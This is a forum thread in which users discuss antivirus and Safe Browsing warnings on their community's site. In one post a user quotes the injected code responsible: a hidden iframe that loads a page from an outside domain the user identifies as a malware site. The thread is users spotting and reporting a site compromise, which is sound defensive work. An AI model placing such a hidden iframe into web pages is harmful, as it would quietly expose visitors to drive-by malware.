+ Reply to Thread
Page 1 of 4 1 2 3 ... LastLast
Results 1 to 10 of 33

Thread: Oh wow

  1. #1
    Banned Golden Crispy
    Join Date
    Mar 2012
    Posts
    114

    Oh wow

    Upon visiting the site today:



    Screencapped earlier today.

  2. #2
    Bacon Enthusiast/Mod Pudding Revolution H.Protagonist's Avatar
    Join Date
    Apr 2011
    Location
    California
    Posts
    233
    Thanks for the heads up, Slur. We're looking into it.
    Catapultam habeo. Nisi pecuniam omnem mihi dabis, ad caput tuum saxum immane mittam.

  3. #3
    SIN, The All-Seeing Eye Truffled Trifle SIN's Avatar
    Join Date
    Oct 2011
    Location
    Indianapolis
    Posts
    1,055
    That's strange, people report these problems sometimes but I never seem to get any (excluding the time when the forums were shut down). I use Firefox at work and Chrome at home (haven't been on from home in awhile) But I wonder if there is something malicious on the site (or maybe Neph is hacking it!!!) or if there is just some sort of bug. Are you using Chrome Slur?

  4. #4
    Senior Member Truffled Trifle kknd's Avatar
    Join Date
    Apr 2011
    Location
    In front of the screen
    Posts
    1,960
    Quote Originally Posted by SIN View Post
    That's strange, people report these problems sometimes but I never seem to get any (excluding the time when the forums were shut down). I use Firefox at work and Chrome at home (haven't been on from home in awhile) But I wonder if there is something malicious on the site (or maybe Neph is hacking it!!!) or if there is just some sort of bug. Are you using Chrome Slur?
    I have nothing too, not on my pc with firefox, nor on my laptop with internet explorer.

  5. #5
    The Real Hero Toothsome Nibblets KnightofAncient's Avatar
    Join Date
    Apr 2011
    Location
    California
    Posts
    252
    Quote Originally Posted by kknd View Post
    I have nothing too, not on my pc with firefox, nor on my laptop with internet explorer.
    Its possible that you do not have the Google Safe Browsing feature installed in your firefox browser. IE's Smart Filtering does not catch it unless you have a Anti-Virus toolbar installed in IE. (Even then it depends on which Anti-Virus)

    I keep mentioning Google Safe Browsing because thats where most of these warning messages keep coming from.

  6. #6
    SIN, The All-Seeing Eye Truffled Trifle SIN's Avatar
    Join Date
    Oct 2011
    Location
    Indianapolis
    Posts
    1,055
    Quote Originally Posted by KnightofAncient View Post
    Its possible that you do not have the Google Safe Browsing feature installed in your firefox browser. IE's Smart Filtering does not catch it unless you have a Anti-Virus toolbar installed in IE. (Even then it depends on which Anti-Virus)

    I keep mentioning Google Safe Browsing because thats where most of these warning messages keep coming from.
    Yeah I guess there are a lot of possibilities.

  7. #7
    Senior Member Truffled Trifle TG_Judgement's Avatar
    Join Date
    Mar 2012
    Posts
    452
    And in the latest round of the forums causing alarms to go off:



    Yeap,the site is trigger my AV now...

  8. #8
    The Real Hero Toothsome Nibblets KnightofAncient's Avatar
    Join Date
    Apr 2011
    Location
    California
    Posts
    252
    Interesting indeed.
    Last edited by KnightofAncient; 04-14-2012 at 04:45 PM.

  9. #9
    Senior Member Truffled Trifle TG_Judgement's Avatar
    Join Date
    Mar 2012
    Posts
    452
    Welp,I decided to just turn off Avast's webshield instead of the whole thing,and now I get this:



    Well,that sure looks familiar.Decided to see where this is on the website's code,and it shows once on this line:

    Quote Originally Posted by Xseed forums source code
    HTML Code:
    <div style='display:none'><iframe width='9' height='6' src='http://mavmor.in/loop.php' frameborder='0' scrolling='no'></iframe></div>
    Now,it's been ages since since I've learned anything about HTML code,but that seems like a hidden element to me.A cursory glance on the internet also seems to pretty much indicate that mavmor.in is a malware site, and compromised sites are being snuck these code lines on their templates.

    What I'm trying to say here is:You might all want to do a full virus check. :v

    Edit:Haha.Yeah,you did.I guess I stopped paying attention after I made my post. Still,either the webadmin (or whoever's running this show) hasn't fixed this yet,or the code got snuck back in. A pain either way...
    ˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅˅
    Last edited by TG_Judgement; 04-14-2012 at 07:54 PM.

  10. #10
    The Real Hero Toothsome Nibblets KnightofAncient's Avatar
    Join Date
    Apr 2011
    Location
    California
    Posts
    252
    Thats basically what I said in the other thread and what the Google Safe Browsing notification states. Mavmor.in is a site in France according to my trace results.

    Quote Originally Posted by KnightofAncient View Post
    There is a possibility it can be a real since the problem is not malware but according to the notification it is content from another site in the Forum's source code thats raising the red flag.
    Add-on: Until the hole is fixed, it could still sneak back in to the forum. Heck, as long as the hole in the security is still open there is a possibility it could get worse, but it hasnt which is good.
    Last edited by KnightofAncient; 04-14-2012 at 08:05 PM.

+ Reply to Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts